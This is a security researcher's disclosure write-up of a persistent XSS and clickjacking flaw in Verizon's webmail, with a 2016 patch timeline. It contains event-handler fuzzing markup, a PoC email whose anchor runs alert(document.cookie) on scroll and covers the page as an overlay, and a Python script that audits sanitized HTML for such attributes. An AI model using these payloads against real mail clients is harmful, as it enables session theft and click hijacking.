I’ve previously written about a server-side vulnerability in Verizon’s webmail client, but I thought it was also worth covering a couple of interesting client-side vulns I discovered that would’ve allowed an attacker to compromise a victim’s entire email account.
I started by attempting to identify the allowed HTML elements/attributes in the webmail client. Although there’s probably a better way to do this, I simply generated a list of all valid HTML elements along with all possible attributes for each. Here’s the link to the full file; a sample is included below:
<figure onafterprint="console.log(244599)" onbeforeprint="console.log(309354)" onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)" onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)" ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)" onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)" onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)" oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)" oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)" onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)" onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)" ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)" ondragenter="console.log(197257)" ondragleave="console.log(238440)" ondragover="console.log(783418)" ondragstart="console.log(773843)" ondrop="console.log(436878)" onmousedown="console.log(153386)" onmousemove="console.log(598217)" onmouseout="console.log(425628)" onmouseover="console.log(359441)" onmouseup="console.log(687310)" onmousewheel="console.log(823824)" onscroll="console.log(175565)" onwheel="console.log(595449)" oncopy="console.log(243603)" oncut="console.log(841770)" onpaste="console.log(489332)" onabort="console.log(516667)" oncanplay="console.log(329437)" oncanplaythrough="console.log(754238)" oncuechange="console.log(268702)" ondurationchange="console.log(455721)" onemptied="console.log(923165)" onended="console.log(330716)" onerror="console.log(382133)" onloadeddata="console.log(268470)" onloadedmetadata="console.log(934963)" onloadstart="console.log(664605)" onpause="console.log(957774)" onplay="console.log(750548)" onplaying="console.log(887438)" onprogress="console.log(648208)" onratechange="console.log(742465)" onseeked="console.log(559902)" onseeking="console.log(296937)" onstalled="console.log(613468)" onsuspend="console.log(651399)" ontimeupdate="console.log(993291)" onvolumechange="console.log(508203)" onwaiting="console.log(146149)" onerror="console.log(470459)" onshow="console.log(586099)" ontoggle="console.log(739568)" accesskey="test3617" class="test3617" contenteditable="test3617" contextmenu="test3617" data-nent="test3617" dir="test3617" draggable="test3617" dropzone="test3617" hidden="test3617" id="test3617" lang="test3617" spellcheck="test3617" style="display:block" tabindex="test3617" title="test3617" translate="test3617">Test</figure>
<footer onafterprint="console.log(244599)" onbeforeprint="console.log(309354)" onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)" onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)" ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)" onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)" onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)" oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)" oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)" onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)" onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)" ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)" ondragenter="console.log(197257)" ondragleave="console.log(238440)" ondragover="console.log(783418)" ondragstart="console.log(773843)" ondrop="console.log(436878)" onmousedown="console.log(153386)" onmousemove="console.log(598217)" onmouseout="console.log(425628)" onmouseover="console.log(359441)" onmouseup="console.log(687310)" onmousewheel="console.log(823824)" onscroll="console.log(175565)" onwheel="console.log(595449)" oncopy="console.log(243603)" oncut="console.log(841770)" onpaste="console.log(489332)" onabort="console.log(516667)" oncanplay="console.log(329437)" oncanplaythrough="console.log(754238)" oncuechange="console.log(268702)" ondurationchange="console.log(455721)" onemptied="console.log(923165)" onended="console.log(330716)" onerror="console.log(382133)" onloadeddata="console.log(268470)" onloadedmetadata="console.log(934963)" onloadstart="console.log(664605)" onpause="console.log(957774)" onplay="console.log(750548)" onplaying="console.log(887438)" onprogress="console.log(648208)" onratechange="console.log(742465)" onseeked="console.log(559902)" onseeking="console.log(296937)" onstalled="console.log(613468)" onsuspend="console.log(651399)" ontimeupdate="console.log(993291)" onvolumechange="console.log(508203)" onwaiting="console.log(146149)" onerror="console.log(470459)" onshow="console.log(586099)" ontoggle="console.log(739568)" accesskey="test3617" class="test3617" contenteditable="test3617" contextmenu="test3617" data-nent="test3617" dir="test3617" draggable="test3617" dropzone="test3617" hidden="test3617" id="test3617" lang="test3617" spellcheck="test3617" style="display:block" tabindex="test3617" title="test3617" translate="test3617">Test</footer>
Next, I sent an HTML email to my own Verizon address using the payload above as the body:
[user@rw verizon-poc]$ head email.txt | less
Content-Type: text/html;
Subject: Testing the new email

<a onafterprint="console.log(244599)" onbeforeprint="console.log(309354)" onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)" onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)" ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)" onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)" onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)" oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)" oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)">Test</a>
<!-- Snipped -->
[user@rw verizon-poc]$ sendmail -t ***REMOVED***@verizon.net < ./email.txt
After it was sent, I logged into webmail and opened the message:
I then opened up Chrome’s dev console and started looking over the rendered HTML elements/attributes. I immediately noticed a few interesting attributes that made it through unfiltered, the most severe of which were onwheel and oninput. I also noticed that the style attribute was left unfiltered, which would’ve allowed clickjacking and other kinds of malicious UI redressing.
To confirm/demonstrate exploitability, I put together a PoC containing a payload leveraging both vulnerabilities:
Content-Type: text/html;
Subject: PoC

Verizon Webmail PoC - Move scrollwheel to trigger the XSS payload. Note the overlay anchor that also demonstrates the clickjacking vulnerability.
<a href="https://en.wikipedia.org/wiki/Clickjacking" onwheel="alert(document.cookie)" style="position:fixed;top:0;left:0;width:100%;height:100%;"></a>
<br>
<br>
<!-- Snipped -->
<br>
<br>
<br>
<div style="font-size:72px">
An interesting message here to entice the user to scroll down.
</div>
<br>
<br>
<br>
<!-- Snipped -->
<br>
<br>
I emailed myself the new payload and opened it in webmail. Here’s a look at the XSS payload being triggered:
Also, note the style attribute on the anchor above which effectively turns it into an overlay covering the entire clickable page. This means that regardless of whether the XSS payload is triggered by moving the mouse wheel, the anchor element’s overlay all but guarantees the user will unsuspectingly click on an attacker-controlled link.
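The two findings above (event-handler attributes surviving the filter, and a style attribute free to set position:fixed with full-page dimensions) translate directly into a regression check that a webmail team can run against its sanitizer's output. The following is an added example, not code from the original post or from Verizon's webmail; it uses Python's standard-library html.parser, and the CSS property allowlist, the overlay-property set, the forbidden-tag set and the two sample bodies are assumptions chosen to illustrate the policy of restricting style directives.

```python
"""Audit HTML that has come out of a mail sanitizer for the attribute classes
the post shows surviving the filter: inline event handlers (onwheel, oninput,
...) and style declarations that let an element sit on top of the page as a
clickjacking overlay. Added example, not code from the original post; the
property allowlists, forbidden tags and sample messages below are assumptions."""
from html.parser import HTMLParser

# CSS properties a message body is allowed to set (assumed policy).
ALLOWED_CSS_PROPERTIES = {
    "color", "background-color", "font-size", "font-family", "font-weight",
    "font-style", "text-align", "text-decoration", "margin", "padding",
    "display", "width", "height", "border",
}

# Properties that take an element out of the normal flow or stack it over the
# client's own UI; 'position:fixed;top:0;left:0' from the PoC lands here.
OVERLAY_CSS_PROPERTIES = {
    "position", "top", "left", "right", "bottom", "z-index", "opacity",
    "pointer-events", "transform",
}

# Tags that should never survive sanitization of a message body (assumed).
FORBIDDEN_TAGS = {"script", "iframe", "object", "embed", "base", "meta",
                  "link", "form"}


def parse_style(value):
    """Split a style attribute into lower-cased (property, value) pairs."""
    declarations = []
    for chunk in value.split(";"):
        if ":" not in chunk:
            continue  # empty trailing chunk or malformed declaration
        prop, val = chunk.split(":", 1)
        declarations.append((prop.strip().lower(), val.strip().lower()))
    return declarations


class AttributeAuditor(HTMLParser):
    """Record a (kind, tag, name, value) finding for every risky construct.

    HTMLParser lower-cases tag and attribute names, so ONWHEEL and onwheel are
    treated alike; self-closing tags such as <img .../> also reach
    handle_starttag through the default handle_startendtag.
    """

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in FORBIDDEN_TAGS:
            self.findings.append(("forbidden-tag", tag, "", ""))
        for name, value in attrs:
            value = value or ""  # valueless attributes parse as None
            if name.startswith("on"):
                # Every HTML attribute beginning with "on" is an event handler.
                self.findings.append(("event-handler", tag, name, value))
            elif name == "style":
                for prop, val in parse_style(value):
                    if prop in OVERLAY_CSS_PROPERTIES:
                        self.findings.append(("overlay-style", tag, prop, val))
                    elif prop not in ALLOWED_CSS_PROPERTIES:
                        self.findings.append(("disallowed-style", tag, prop, val))


def audit(html):
    """Return the list of findings for one sanitized HTML body."""
    auditor = AttributeAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed sample: the overlay anchor from the post's PoC, as the sanitizer
# left it in the rendered message.
POC_ANCHOR = (
    '<a href="https://en.wikipedia.org/wiki/Clickjacking" '
    'onwheel="alert(document.cookie)" '
    'style="position:fixed;top:0;left:0;width:100%;height:100%;"></a>'
)

# Constructed sample: a benign message that only uses allowed styling.
BENIGN_BODY = '<div style="font-size:72px; color:#333">An interesting message.</div>'

if __name__ == "__main__":
    for label, body in (("poc", POC_ANCHOR), ("benign", BENIGN_BODY)):
        print(label, "->", audit(body) or "clean")
```

Run it against what the client actually renders, not against the raw message: the point of the test above was that the filter let these attributes through, so the auditor has to see the post-sanitization DOM. It is a check on a sanitizer, not a sanitizer itself; the fix belongs in a parser-based allowlist sanitizer (DOMPurify is one such library), where the same two rules apply: drop every attribute whose name begins with "on", and keep only style declarations from an explicit property allowlist.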
Disclosure
2016-03-28 | Vuln reported to Verizon, PoC sent
2016-04-21 | XSS vuln patched, waiting on clickjacking
2016-04-21 | I recommend restricting style attribute directives to mitigate clickjacking
2016-04-25 | Clickjacking vuln patched
Persistent XSS in email clients can be dangerous, largely because the payload is delivered directly to the victim, who is guaranteed to be authenticated when it executes. While many XSS vulns require some legwork to exploit, this one only required that the victim open a specifically crafted email (and scroll the mouse wheel) for the malicious payload to execute. Combined with the additional clickjacking vuln, this made for a simple (and effective) attack scenario.